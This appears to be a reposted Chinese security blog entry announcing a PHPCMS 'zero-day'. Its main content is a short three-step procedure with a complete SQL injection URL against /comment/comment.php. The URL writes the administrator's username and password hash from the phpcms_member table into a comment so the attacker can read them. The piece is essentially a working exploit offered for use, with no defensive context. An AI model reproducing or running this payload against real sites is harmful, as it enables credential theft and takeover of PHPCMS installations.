【Oday】phpcms 0day 一枚

admin 2021年4月3日19:09:25评论93 views字数 413阅读1分22秒阅读模式

1、找到任意一篇文章发表评论并得到评论ID

2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID

3、重新查看评论

漏洞成因很简单,利用方法也不止这一种,有兴趣的同学可以研究下。

文章来源于lcx.cc:【Oday】phpcms 0day 一枚

相关推荐: 【VB】VB Clipboard 系统剪贴板操作函数详解

    VB Clipboard 系统剪贴板操作函数详解,VB Clipboard 系统剪贴板操作详解,VB Clipboard 系统剪贴板操作函数,VB Clipboard 剪贴板操作函数详解,VB Clipboard 剪贴板操作函数,VB Clipboar…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:09:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Oday】phpcms 0day 一枚https://cn-sec.com/archives/319968.html

发表评论

匿名网友 填写信息